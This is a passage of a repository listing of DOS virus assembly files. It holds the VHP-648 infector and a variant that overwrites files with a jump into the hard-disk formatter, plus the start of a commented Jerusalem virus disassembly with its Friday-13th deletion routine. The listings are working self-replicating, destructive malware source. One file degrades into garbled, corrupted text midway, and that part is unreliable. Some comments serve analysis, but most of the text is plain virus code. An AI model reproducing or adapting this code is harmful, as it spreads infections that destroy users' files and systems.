mov dx,cs:[buffer+1] ;save new jump
lea cx,cont-100h
sub dx,cx
mov cs:[conta],dx
;*****************************************************
; The virus copies itself to the start of the file.
;*****************************************************
mov ah,57h ;write date
mov al,1
pop dx
pop cx ;restore date
int 21h
;*****************************************************
; Close the file.
;*****************************************************
mov ah,3eh ;close file
int 21h
;*****************************************************
; Restore the old jump address. The virus saves at
; address "conta" the jump which was at the start of
; the host program.
; This is done to preserve the executability of the
; host program as much as possible.
; After saving it still works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory.
;****************************************************
mov dx,cs:[jmpbuf] ;restore old jump
mov cs:[conta],dx
hops: nop
call use_old
;****************************************************
; Continue with the host program.
;****************************************************
cont db 0e9h ;make jump
conta dw 0
mov ah,00
int 21h
;***************************************************
; Reactivate the selected drive at the start of
; the program.
;***************************************************
use_old:
mov ah,0eh ;use old drive
mov dl,cs:drive
int 21h
;***************************************************
; Reactivate the selected path at the start of
; the program.
;***************************************************
mov ah,3bh ;use old drive
lea dx,old_path-1 ;get old path and backslash
int 21h
ret
search_order db 0ffh,1,0,2,3,0ffh,00,offh
pointer dw 0000 ;pointer f. search order
counter dw 0000 ;counter f. nth. search
disks db 0 ;number of disks
maske_com db "*.com",00 ;search for com files
maske_dir db "*",00 ;search for dir's
maske_exe db offh,0,0,0,0,0,00111111b
db 0,"????????exe",0,0,0,0
db 0,"????????com",0
maske_all db offh,0,0,0,0,0,00111111b
db 0,"???????????",0,0,0,0
db 0,"????????com",0
buffer equ 0e00h ;a safe place
buflen equ 230h ;lenght of virus!!!!
;carefull
;if changing!!!!
jmpbuf equ buffer+buflen ;a safe place for jmp
path db "\",0 ;first place
drive db 0 ;actual drive
back_slash db "\"
old_path db 32 dup (?) ;old path
code ends
end main
;[ END OF THIS VIRUS PROGRAM ]


331
MSDOS/Virus.MSDOS.Unknown.virus2.asm Normal file
View File

@ -0,0 +1,331 @@
name Virus
title Disassembly listing of the VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
start:
jmp virus
message db 'Hello, world!$'
mov ah,9
mov dx,offset message
int 21
int 20
virus:
push cx ;Save CX
mov dx,offset data ;Restore original first instruction
modify equ $-2 ;The instruction above is changed
; before each contamination
cld
mov si,dx
add si,saveins-data ;Instruction saved there
mov di,offset start
mov cx,3 ;Move 3 bytes
rep movsb ;Do it
mov si,dx ;Keep SI pointed at data
mov ah,30 ;Get DOS version
int 21
cmp al,0 ;Less than 2.0?
jne skip1
jmp exit ;Exit if so
skip1:
push es ;Save ES
mov ah,2F ;Get current DTA in ES:BX
int 21
mov word ptr [si+0],bx ;dtaadr
mov word ptr [si+2],es
pop es ;Restore ES
mov dx,mydta-data
add dx,si
mov ah,1A ;Set DTA
int 21
push es ;Save ES & SI
push si
mov es,ds:[environ] ;Environment address
mov di,0
n_00015A: ;Search 'PATH=' in the environment
pop si ;Restore data offset in SI
push si
add si,pathstr-data
lodsb
mov cx,8000 ;Maximum 32K in environment
repne scasb ;Search for first letter ('P')
mov cx,4 ;4 letters in 'PATH'
n_000169:
lodsb ;Search for next char
scasb
jne n_00015A ;If not found, search for next 'P'
loop n_000169 ;Loop until done
pop si ;Restore SI & ES
pop es
mov [si+16],di ;Save 'PATH' offset in poffs
mov di,si
add di,fname-data ;Point SI & DI at '=' sign
mov bx,si ;Point BX at data area
add si,fname-data
mov di,si
jmp short n_0001BF
n_000185:
cmp word ptr [si+16],6C ;poffs
jne n_00018F
jmp olddta
n_00018F:
push ds
push si
mov ds,es:[environ]
mov di,si
mov si,es:[di+16] ;poffs
add di,fname-data
n_0001A1:
lodsb
cmp al,';'
je n_0001B0
cmp al,0
je n_0001AD
stosb
jmp n_0001A1
n_0001AD:
mov si,0
n_0001B0:
pop bx
pop ds
mov [bx+16],si ;poffs
cmp byte ptr [di-1],'\'
je n_0001BF
mov al,'\' ;Add '\' if not already present
stosb
n_0001BF:
mov [bx+18],di ;Save '=' offset in eqoffs
mov si,bx ;Restore data pointer in SI
add si,allcom-data
mov cx,6 ;6 bytes in ASCIIZ '*.COM'
rep movsb ;Move '*.COM' at fname
mov si,bx ;Restore SI
mov ah,4E ;Find first file
mov dx,fname-data
add dx,si
mov cx,11b ;Hidden, Read/Only or Normal files
int 21
jmp short n_0001E3
findnext:
mov ah,4F ;Find next file
int 21
n_0001E3:
jnc n_0001E7 ;If found, try to contaminate it
jmp n_000185 ;Otherwise search in another directory
n_0001E7:
mov ax,[si+75] ;Check file time
and al,11111b ; (the seconds, more exactly)
cmp al,62d/2 ;Are they 62?
;If so, file is already contains the virus, search for another:
je findnext
cmp [si+79],64000d ;Is file size greather than 64,000 bytes?
ja findnext ;If so, search for next file
cmp word ptr [si+79],10d ;Is file size less than 10 bytes?
jb findnext ;If so, search for next file
mov di,[si+18] ;eqoffs
push si ;Save SI
add si,namez-data ;Point SI at namez
n_000209:
lodsb
stosb
cmp al,0
jne n_000209
pop si ;Restore SI
mov ax,4300 ;Get file attributes
mov dx,fname-data
add dx,si
int 21
mov [si+8],cx ;Save them in fattrib
mov ax,4301 ;Set file attributes
;The next `db's are there because MASM can't assemble
; the instruction `and cx,0FFFE' correctly (the fool!):
db 081,0E1,0FE,0FF
; and cx,not 1 ;Turn off Read Only flag
mov dx,fname-data
add dx,si
int 21
mov ax,3D02 ;Open file with Read/Write access
mov dx,fname-data
add dx,si
int 21
jnc n_00023E
jmp oldattr ;Exit on error
n_00023E:
mov bx,ax ;Save file handle in BX
mov ax,5700 ;Get file date & time
int 21
mov [si+4],cx ;Save time in ftime
mov [si+6],dx ;Save date in fdate
mov ah,2C ;Get system time
int 21
and dh,111b ;Are seconds a multiple of 8?
;If so, destroy file (don't contaminate). Now this code is disabled.
jmp short n_000266 ;CHANGED. Was jnz here
;Destroy file by rewriting an illegal jmp as first instruction:
mov ah,40 ;Write to file handle
mov cx,5 ;Write 5 bytes
mov dx,si
add dx,bad_jmp-data ;Write THESE bytes
int 21 ;Do it
jmp short oldtime ;Exit
;Try to contaminate file:
;Read first instruction of the file (first 3 bytes) and save it in saveins:
n_000266:
mov ah,3F ;Read from file handle
mov cx,3 ;Read 3 bytes
mov dx,saveins-data ;Put them there
add dx,si
int 21
jc oldtime ;Exit on error
cmp ax,3 ;Are really 3 bytes read?
jne oldtime ;Exit if not
;Move file pointer to end of file:
mov ax,4202 ;LSEEK from end of file
mov cx,0 ;0 bytes from end
mov dx,0
int 21
jc oldtime ;Exit on error
mov cx,ax ;Get the value of file pointer
sub ax,3 ;Subtract 3 from it to get real code size
mov [si+14d],ax ;Save result in filloc
add cx,data-(virus-100)
mov di,si
sub di,data-modify ;A little self-modification
mov [di],cx
mov ah,40 ;Write to file handle
mov cx,enddata-virus ;Virus code length as bytes to be written
mov dx,si
sub dx,data-virus ;Now DX points at virus label
int 21
jc oldtime ;Exit on error
cmp ax,enddata-virus ;Are all bytes written?
jne oldtime ;Exit if not
mov ax,4200 ;LSEEK from the beginning of the file
mov cx,0 ;Just at the file beginning
mov dx,0
int 21
jc oldtime ;Exit on error
;Rewrite the first instruction of the file with a jump to the virus code:
mov ah,40 ;Write to file handle
mov cx,3 ;3 bytes to write
mov dx,si
add dx,newjmp-data ;Write THESE bytes
int 21
oldtime:
mov dx,[si+6] ;Restore file date
mov cx,[si+4] ; and time
;And these again are due to the MASM 5.0 foolness:
db 081,0E1,0E0,0FF
db 081,0C9,01F,000
; and cx,not 11111b
; or cx,11111b ;Set seconds to 62 (?!)
mov ax,5701 ;Set file date & time
int 21
mov ah,3E ;Close file handle
int 21
oldattr:
mov ax,4301 ;Set file attributes
mov cx,[si+8] ;They were saved in fattrib
mov dx,fname-data
add dx,si
int 21
olddta:
push ds ;Save DS
mov ah,1A ;Set DTA
mov dx,[si+0] ;Restore saved DTA
mov ds,[si+2]
int 21
pop ds ;Restore DS
exit:
pop cx ;Restore CX
xor ax,ax ;Clear registers
xor bx,bx
xor dx,dx
xor si,si
mov di,100 ;Jump to CS:100
push di ; by doing funny RET
xor di,di
ret -1
data label byte ;Data section
dtaaddr dd ? ;Disk Transfer Address
ftime dw ? ;File date
fdate dw ? ;File time
fattrib dw ? ;File attribute
saveins db 0EBh,0Fh,90 ;Original first 3 bytes
newjmp db 0E9 ;Code of jmp instruction
filloc dw ? ;File pointer is saved here
allcom db '*.COM',0 ;Filespec to search for
poffs dw ? ;Address of 'PATH' string
eqoffs dw ? ;Address of '=' sign
pathstr db 'PATH='
fname db 40 dup (' ') ;Path name to search for
;Disk Transfer Address for Find First / Find Next:
mydta label byte
drive db ? ;Drive to search for
pattern db 13d dup (?) ;Search pattern
reserve db 7 dup (?) ;Not used
attrib db ? ;File attribute
time dw ? ;File time
date dw ? ;File date
fsize dd ? ;File size
namez db 13d dup (?) ;File name found
;This replaces the first instruction of a destroyed file:
bad_jmp db 0EA,0Bh,2,13,58
enddata label byte
code ends
end start


309
MSDOS/Virus.MSDOS.Unknown.virus3.asm Normal file
View File

@ -0,0 +1,309 @@
name Virus
title Virus; based on the famous VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
start:
jmp virus
int 20
data label byte ;Data section
dtaaddr dd ? ;Disk Transfer Address
ftime dw ? ;File date
fdate dw ? ;File time
fattrib dw ? ;File attribute
saveins db 3 dup (90) ;Original first 3 bytes
newjmp db 0E9 ;Code of jmp instruction
codeptr dw ? ;Here is formed a jump to virus code
allcom db '*.COM',0 ;Filespec to search for
poffs dw ? ;Address of 'PATH' string
eqoffs dw ? ;Address of '=' sign
pathstr db 'PATH='
fname db 40 dup (' ') ;Path name to search for
;Disk Transfer Address for Find First / Find Next:
mydta label byte
drive db ? ;Drive to search for
pattern db 13d dup (?) ;Search pattern
reserve db 7 dup (?) ;Not used
attrib db ? ;File attribute
time dw ? ;File time
date dw ? ;File date
fsize dd ? ;File size
namez db 13d dup (?) ;File name found
;This replaces the first instruction of a destroyed file.
;It's a jmp instruction into the hard disk formatting program (IBM XT only):
bad_jmp db 0EA,0,0,0,0C8
errhnd dd ?
virus:
push cx ;Save CX
mov dx,offset data ;Restore original first instruction
modify equ $-2 ;The instruction above is changed
; before each contamination
cld
mov si,dx
add si,saveins-data ;Instruction saved there
mov di,offset start
mov cx,3 ;Move 3 bytes
rep movsb ;Do it
mov si,dx ;Keep SI pointed at data
mov ah,30 ;Get DOS version
int 21
cmp al,0 ;Less than 2.0?
jne skip1
jmp exit ;Exit if so
skip1:
push es ;Save ES
mov ah,2F ;Get current DTA in ES:BX
int 21
mov [si+dtaaddr-data],bx ;Save it in dtaaddr
mov [si+dtaaddr+2-data],es
mov ax,3524 ;Get interrupt 24h handler
int 21 ; and save it in errhnd
mov [si+errhnd-data],bx
mov [si+errhnd+2-data],es
pop es ;Restore ES
mov ax,2524 ;Set interrupt 24h handler
mov dx,si
add dx,handler-data
int 21
mov dx,mydta-data
add dx,si
mov ah,1A ;Set DTA
int 21
push es ;Save ES & SI
push si
mov es,ds:[environ] ;Environment address
xor di,di
n_00015A: ;Search 'PATH' in environment
pop si ;Restore data offset in SI
push si
add si,pathstr-data
lodsb
mov cx,8000 ;Maximum 32K in environment
repne scasb ;Search for first letter ('P')
mov cx,4 ;4 letters in 'PATH'
n_000169:
lodsb ;Search for next char
scasb
jne n_00015A ;If not found, search for next 'P'
loop n_000169 ;Loop until done
pop si ;Restore SI & ES
pop es
mov [si+poffs-data],di ;Save 'PATH' offset in poffs
mov bx,si ;Point BX at data area
add si,fname-data ;Point SI & DI at fname
mov di,si
jmp short n_0001BF
n_000185:
cmp word ptr [si+poffs-data],6C
jne n_00018F
jmp olddta
n_00018F:
push ds
push si
mov ds,es:[environ]
mov di,si
mov si,es:[di+poffs-data]
add di,fname-data
n_0001A1:
lodsb
cmp al,';'
je n_0001B0
cmp al,0
je n_0001AD
stosb
jmp n_0001A1
n_0001AD:
xor si,si
n_0001B0:
pop bx
pop ds
mov [bx+poffs-data],si
cmp byte ptr [di-1],'\'
je n_0001BF
mov al,'\' ;Add '\' if not already present
stosb
n_0001BF:
mov [bx+eqoffs-data],di ;Save '=' offset in eqoffs
mov si,bx ;Restore data pointer in SI
add si,allcom-data
mov cl,6 ;6 bytes in ASCIIZ '*.COM'
rep movsb ;Move '*.COM' at fname
mov si,bx ;Restore SI
mov ah,4E ;Find first file
mov dx,fname-data
add dx,si
mov cl,11b ;Hidden, Read/Only or Normal files
int 21
jmp short n_0001E3
findnext:
mov ah,4F ;Find next file
int 21
n_0001E3:
jnc n_0001E7 ;If found, try to contaminate it
jmp n_000185 ;Otherwise search in another directory
n_0001E7:
mov ax,[si+time-data] ;Check file time
and al,11111b ; (the seconds, more exactly)
cmp al,62d/2 ;Are they 62?
;If so, file is already contains the virus, search for another:
je findnext
;Is file size greather than 64,000 bytes?
cmp [si+fsize-data],64000d
ja findnext ;If so, search for next file
;Is file size less than 10 bytes?
cmp word ptr [si+fsize-data],10d
jb findnext ;If so, search for next file
mov di,[si+eqoffs-data]
push si ;Save SI
add si,namez-data ;Point SI at namez
n_000209:
lodsb
stosb
cmp al,0
jne n_000209
pop si ;Restore SI
mov ax,4300 ;Get file attributes
mov dx,fname-data
add dx,si
int 21
mov [si+fattrib-data],cx ;Save them in fattrib
mov ax,4301 ;Set file attributes
and cl,not 1 ;Turn off Read Only flag
int 21
mov ax,3D02 ;Open file with Read/Write access
int 21
jnc n_00023E
jmp oldattr ;Exit on error
n_00023E:
mov bx,ax ;Save file handle in BX
mov ax,5700 ;Get file date & time
int 21
mov [si+ftime-data],cx ;Save time in ftime
mov [si+fdate-data],dx ;Save date in fdate
mov ah,2C ;Get system time
int 21
and dh,111b ;Are seconds a multiple of 8?
jnz n_000266 ;If not, contaminate file (don't destroy):
;Destroy file by rewriting an illegal jmp as first instruction:
mov ah,40 ;Write to file handle
mov cx,5 ;Write 5 bytes
mov dx,si
add dx,bad_jmp-data ;Write THESE bytes
int 21 ;Do it
jmp short oldtime ;Exit
;Try to contaminate file:
;Read first instruction of the file (first 3 bytes) and save it in saveins:
n_000266:
mov ah,3F ;Read from file handle
mov cx,3 ;Read 3 bytes
mov dx,saveins-data ;Put them there
add dx,si
int 21
jc oldtime ;Exit on error
cmp ax,3 ;Are really 3 bytes read?
jne oldtime ;Exit if not
;Move file pointer to end of file:
mov ax,4202 ;LSEEK from end of file
xor cx,cx ;0 bytes from end
xor dx,dx
int 21
jc oldtime ;Exit on error
mov cx,ax ;Get the value of file pointer (file size)
add ax,virus-data-3 ;Add virus data length to get code offset
mov [si+codeptr-data],ax ;Save result in codeptr
inc ch ;Add 100h to CX
mov di,si
add di,modify-data ;A little self-modification
mov [di],cx
mov ah,40 ;Write to file handle
mov cx,endcode-data ;Virus code length as bytes to be written
mov dx,si ;Write from data to endcode
int 21
jc oldtime ;Exit on error
cmp ax,endcode-data ;Are all bytes written?
jne oldtime ;Exit if not
mov ax,4200 ;LSEEK from the beginning of the file
xor cx,cx ;Just at the file beginning
xor dx,dx
int 21
jc oldtime ;Exit on error
;Rewrite the first instruction of the file ate-dne bove ata area
adttttttt
grrr
frrrrrrt:
mov ah,4Frrrrrrrrrrre EPpll zDstrrrrrr
e ata area
adttttttt
grrr
g1r1rH)a0x,2524 a0me l eO3Efleqryc+qn_00dd si,d ont 21
jc oldtime ;Exit on error
cmp me l eO3E*;
conds, more exa mov ahop ssi,d ont 21 G3,n'0exit ;Exit if i bl eO3Efleq n_0001A1:
lods01:
Tn v ax,vitrtvs,pathstrt
rp
tore SI
ff to enaMvall byly ont 21
jc ?i eO3js
mar it vall bylit vall tfll etan
rE ax,[di+poffs-datat
conds,lodsblit )Eo
:b; eO3Eeax ;Get the value of file pointer (f
mar file
xor'artvs,papoinre to file hand ;n written?
jenaMoS wi,edO3E*;cog1ll byly ont 2ijc oltfll etan
rnax,4CSave 'n,X cs,papa tss a font ah,4E ,Nt5h
enaMoS wta 'p ax,c olhem in Kpto file hand ;n writc file
;o dleptrle han yc+qnlile
xor'artvsd ;nCcfont n v ae od
mo ldfile
le hh znt S wi, d
rt2

1275
MSDOS/Virus.MSDOS.Unknown.virus32a.asm Normal file
View File

File diff suppressed because it is too large Load Diff

897
MSDOS/Virus.MSDOS.Unknown.virus33.asm Normal file
View File

@ -0,0 +1,897 @@
The following is a disassembled, structured and commented listing of the
Jerusalem .COM and .EXE infector virus. All comments, structure inclusions
and explanations are copyright John McAfee and Associates 1988, all rights
reserved. DO NOT distribute without contacting John at 408 988 3832, or
write :
John McAfee
4423 Cheeney Street
Santa Clara, CA 95054
(NOTE: This is an extraordinarily poor disassembly. We purposely spent
little time on it since it is a common virus that has been thoroughly
studied by dozens of others. - In other words - we were lazy).
PAGE 64,132
;-----------------------------------------------------------------------;
; THE "JERUSALEM" VIRUS ;
;-----------------------------------------------------------------------;
;
ORG 100H ;
;
;-----------------------------------------------------------------------;
; JERUSALEM VIRUS ;
;-----------------------------------------------------------------------;
BEGIN_COM: ;COM FILES START HERE
JMP CONTINUE ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
A0103 DB 073H,055H
MS_DOS DB 'MsDos' ;
DB 000H,001H,015H,018H
TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED!
DB 000H
A0010 DB 000H
A0011 DW 100H ;HOST SIZE (BEFORE INFECTION)
OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC)
OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR
OLD_24 DW 0556H,16A5H ;001B
A_FLAG DW 7E48H ;???
A0021 DB 000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H
A002C DW 0 ;A SEGMENT
DB 000H,000H
A0030 DB 000H
A0031 DW 0178EH ;OLD ES VALUE
A0033 DW 0080H ;
;
EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035
DW 80H ;COMMAND LINE ADDRESS
DW 178EH ;+4
DW 005CH ;FCB #1 ADDRESS
DW 178EH ;+8
DW 006CH ;FCB #2 ADDRESS
DW 0178EH ;+12
;
HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043
HOST_SS DW 347AH ;(AT TIME OF INFECTION)
HOST_IP DW 00C5H ;
HOST_CS DW 347AH ;
;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF
;
A004B DW 0F010H ;
A004D DB 82H ;
A004E DB 0 ;
EXE_HDR DB 1CH DUP (?) ;004F
A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST
HANDLE DW 0005H ;0070
HOST_ATT DW 0020H ;0072
HOST_DATE DW 0021H ;0074
HOST_TIME DW 002DH ;0076
BLOCK_SIZE DW 512 ;512 BYTES/BLOCK
A007A DW 0010H
HOST_SIZE DW 27C0H,0001H ;007C
HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME
COMMAND_COM DB 'COMMAND.COM'
DB 1
A0090 DB 0,0,0,0,0
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
CONTINUE: ;
CLD ;
MOV AH,0E0H ;DO A ???...
INT 21H ;
;
CMP AH,0E0H ;
JNC L01B5 ;
CMP AH,3 ;
JC L01B5 ;
;
MOV AH,0DDH ;
MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE
MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE
ADD SI,DI ;SI = BEGINNING OF HOST CODE
MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?)
INT 21H ;
;
L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H
ADD AX,10H ;
MOV SS,AX ;SS = TWEEKed CS
MOV SP,700H ;SP = END OF OUR CODE (VIRUS)
;
;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF
;
PUSH AX ;JMP FAR CS+10H:IP-100H
MOV AX,offset BEGIN_EXE - offset BEGIN_COM
PUSH AX ;
RETF ;
;
;---------------------------------------;
ORG 0C5h ;
;---------------------------------------;
;
BEGIN_EXE: ;EXE FILES START HERE
CLD ;
PUSH ES ;
;
MOV CS:[A0031],ES ;
MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES
MOV CS:[EXEC_BLOCK+8],ES ;
MOV CS:[EXEC_BLOCK+12],ES ;
;
MOV AX,ES ;TWEEK ES SAME AS CS ABOVE
ADD AX,10H ;
ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE
ADD CS:[HOST_SS],AX ;
;
MOV AH,0E0H ;
INT 21H ;
;
CMP AH,0E0H ;
JNC L0106 ;00F1 7313
;
CMP AH,3 ;
POP ES ;00F6
MOV SS,CS:[HOST_SS] ;
MOV SP,CS:[HOST_SP] ;
JMP far CS:[HSOT_IP] ;
;
L0106: XOR AX,AX ;0106 33C0
MOV ES,AX ;0108 8EC0
MOV AX,ES:[03FC] ;010A 26A1FC03
MOV CS:[A004B],AX ;010E 2EA34B00
MOV AL,ES:[03FE] ;0112 26A0FE03
MOV CS:[A004D],AL ;0116 2EA24D00
MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5
MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB
POP AX ;0127 58
ADD AX,10H ;0128 051000
MOV ES,AX ;012B 8EC0
PUSH CS ;012D 0E
POP DS ;012E 1F
MOV CX,710H ;SIZE OF VIRUS CODE
SHR CX,1 ;0132 D1E9
XOR SI,SI ;0134 33F6
MOV DI,SI ;0136 8BFE
PUSH ES ;0138 06
MOV AX,0142 ;0139 B84201
PUSH AX ;013C 50
JMP 0000:03FC ;013D EAFC030000
;
MOV AX,CS ;0142 8CC8
MOV SS,AX ;0144 8ED0
MOV SP,700H ;0146 BC0007
XOR AX,AX ;0149 33C0
MOV DS,AX ;014B 8ED8
MOV AX,CS:[A004B] ;014D 2EA14B00
MOV [03FC],AX ;0151 A3FC03
MOV AL,CS:[A004D] ;0154 2EA04D00
MOV [03FE],AL ;0158 A2FE03
MOV BX,SP ;015B 8BDC
MOV CL,04 ;015D B104
SHR BX,CL ;015F D3EB
ADD BX,+10 ;0161 83C310
MOV CS:[A0033],BX ;
;
MOV AH,4AH ;
MOV ES,CS:[A0031] ;
INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS
;
MOV AX,3521 ;
INT 21H ;GET VECTOR
MOV CS:[OLD_21],BX ;
MOV CS:[OLD_21+2],ES ;
;
PUSH CS ;0181 0E
POP DS ;0182 1F
MOV DX,offset NEW_INT_21 ;0183 BA5B02
MOV AX,2521 ;
INT 21H ;SAVE VECTOR
;
MOV ES,[A0031] ;018B 8E063100
MOV ES,ES:[A002C] ;018F 268E062C00
XOR DI,DI ;0194 33FF
MOV CX,7FFFH ;0196 B9FF7F
XOR AL,AL ;0199 32C0
REPNE SCASB ;019C AE
CMP ES:[DI],AL ;019D 263805
LOOPNZ 019B ;01A0 E0F9
MOV DX,DI ;01A2 8BD7
ADD DX,+03 ;01A4 83C203
MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM
PUSH ES ;
POP DS ;
PUSH CS ;
POP ES ;
MOV BX,35H ;
;
PUSH DS ;01B1 ;
PUSH ES ;
PUSH AX ;
PUSH BX ;
PUSH CX ;
PUSH DX ;
;
MOV AH,2AH ;
INT 21H ;GET DATE
;
MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE"
;
CMP CX,1987 ;IF 1987...
JE L01F7 ;...JUMP
CMP AL,5 ;IF NOT FRIDAY...
JNE L01D8 ;...JUMP
CMP DL,0DH ;IF DATE IS NOT THE 13th...
JNE L01D8 ;...JUMP
INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT
JMP L01F7 ;
;
L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR
INT 21H ;GET VECTOR
MOV CS:[OLD_08],BX ;
MOV CS:[OLD_08],ES ;
;
PUSH CS ;DS=CS
POP DS ;
;
MOV Word ptr [A_FLAG],7E90H ;
;
MOV AX,2508H ;SET NEW CLOCK TIC HANDLER
MOV DX,offset NEW_08 ;
INT 21H ;SET VECTOR
;
L01F7: POP DX ;
POP CX ;
POP BX ;
POP AX ;
POP ES ;
POP DS ;
PUSHF ;
CALL far CS:[OLD_21] ;
PUSH DS ;
POP ES ;
;
MOV AH,49H ;
INT 21H ;FREE ALLOCATED MEMORY
;
MOV AH,4DH ;
INT 21H ;GET RETURN CODE OF A SUBPROCESS
;
;---------------------------------------;
; THIS IS WHERE WE REMAIN RESIDENT ;
;---------------------------------------;
MOV AH,31H ;
MOV DX,0600H ;020F ;
MOV CL,04 ;
SHR DX,CL ;
ADD DX,10H ;
INT 21H ;TERMINATE AND REMAIN RESIDENT
;
;---------------------------------------;
NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER
IRET ;
;
;-----------------------------------------------------------------------;
; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ;
;-----------------------------------------------------------------------;
NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E
JNE N08_10 ;IF ... JUMP
;
PUSH AX ;
PUSH BX ;
PUSH CX ;
PUSH DX ;
PUSH BP ;
MOV AX,0602H ;SCROLL UP TWO LINES
MOV BH,87H ;INVERSE VIDEO ATTRIBUTE
MOV CX,0505H ;UPPER LEFT CORNER
MOV DX,1010H ;LOWER RIGHT CORNER
INT 10H ;
POP BP ;
POP DX ;
POP CX ;
POP BX ;
POP AX ;
;
N08_10: DEC Word ptr CS:[A_FLAG] ;
JMP N08_90 ;
MOV Word ptr CS:[A_FLAG],1 ;
;
PUSH AX ;????? IS THIS SOME KIND OF DELAY ?????
PUSH CX ;*** COMMENTS SOLICITED **** - WS
PUSH SI ;
MOV CX,4001H ; YES IT IS (1/2 HOUR) BUT THE FUCKER NEVER
REP LODSB ;GETS EXECUTED!!!!!!!!!!! -RLP
POP SI ;
POP CX ;
POP AX ;
;
N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR
;
;-----------------------------------------------------------------------;
; NEW INTERRUPT 21 HANDLER ;
;-----------------------------------------------------------------------;
NEW_21: PUSHF ;025B ;
CMP AH,0E0H ;IF A E0 REQUEST...
JNE N21_10 ;
MOV AX,300H ;...RETURN AX = 300H
POPF ; (OUR PUSHF)
IRET ;
;
N21_10: CMP AH,0DDH ;0266 ;
JE N21_30 ;IF DDH...JUMP TO _30
CMP AH,0DEH ;
JE N21_40 ;IF DEH...JUMP TO _40
CMP AX,4B00H ;IF SPAWN A PROG...
JNE N21_20 ;
JMP N21_50 ;...JUMP TO _50
;
N21_20: POPF ; (OUR PUSHF)
JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR
;
N21_30: POP AX ;REMOVE OUR (PUSHF)
POP AX ;?
MOV AX,100H ;
MOV CS:[000A],AX ;
POP AX ;
MOV CS:[000C],AX ;
REP MOVSB ;
POPF ; (OUR PUSHF)
MOV AX,CS:[000F] ;
JMP far CS:[000A] ;
;
N21_40: ADD SP,+06 ;0298 ;
POPF ; (OUR PUSHF)
MOV AX,CS ;
MOV SS,AX ;
MOV SP,710H ;SIZE OF VIRUS CODE
PUSH ES ;
PUSH ES ;02A4 06
XOR DI,DI ;02A5 33FF
PUSH CS ;02A7 0E
POP ES ;02A8 07
MOV CX,0010 ;02A9 B91000
MOV SI,BX ;02AC 8BF3
MOV DI,0021 ;02AE BF2100
REP MOVSB ;02B2 A4
MOV AX,DS ;02B3 8CD8
MOV ES,AX ;02B5 8EC0
MUL Word ptr CS:[A007A] ;02B7 2EF7267A00
ADD AX,CS:[002B] ;02BC 2E03062B00
ADC DX,+00 ;02C1 83D200
DIV Word ptr CS:[A007A] ;02C4 2EF7367A00
MOV DS,AX ;02C9 8ED8
MOV SI,DX ;02CB 8BF2
MOV DI,DX ;02CD 8BFA
MOV BP,ES ;02CF 8CC5
MOV BX,CS:[002F] ;02D1 2E8B1E2F00
OR BX,BX ;02D6 0BDB
JE 02ED ;02D8 7413
MOV CX,8000 ;02DA B90080
REP MOVSW ;02DE A5
ADD AX,1000 ;02DF 050010
ADD BP,1000 ;02E2 81C50010
MOV DS,AX ;02E6 8ED8
MOV ES,BP ;02E8 8EC5
DEC BX ;02EA 4B
JNE 02DA ;02EB 75ED
MOV CX,CS:[002D] ;02ED 2E8B0E2D00
REP MOVSB ;02F3 A4
POP AX ;02F4 58
PUSH AX ;02F5 50
ADD AX,0010 ;02F6 051000
ADD CS:[0029],AX ;02F9 2E01062900
ADD CS:[0025],AX ;02FE 2E01062500
MOV AX,CS:[0021] ;0303 2EA12100
POP DS ;0307 1F
POP ES ;0308 07
MOV SS,CS:[0029] ;0309 2E8E162900
MOV SP,CS:[0027] ;030E 2E8B262700
JMP far CS:[0023] ;0313 2EFF2E2300
;
;---------------------------------------;
; IT IS TIME FOR THIS FILE TO DIE... ;
; THIS IS WHERE IT GETS DELETED ! ;
;---------------------------------------;
N21_5A: XOR CX,CX ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE (ATT=0)
;
MOV AH,41H ;
INT 21H ;DELETE A FILE
;
MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM
POPF ; (OUR PUSHF)
JMP far CS:[OLD_21] ;
;
;---------------------------------------;
; START INFECTION ;
;---------------------------------------;
N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE...
JE N21_5A ;...JUMP
;
MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN
MOV Word ptr CS:[A008F],0 ;
MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME
MOV word ptr CS:[HOST_NAME+2],DS ;
;
;INFECTION PROCESS OCCURS HERE ;
PUSH AX ;034C 50
PUSH BX ;034D 53
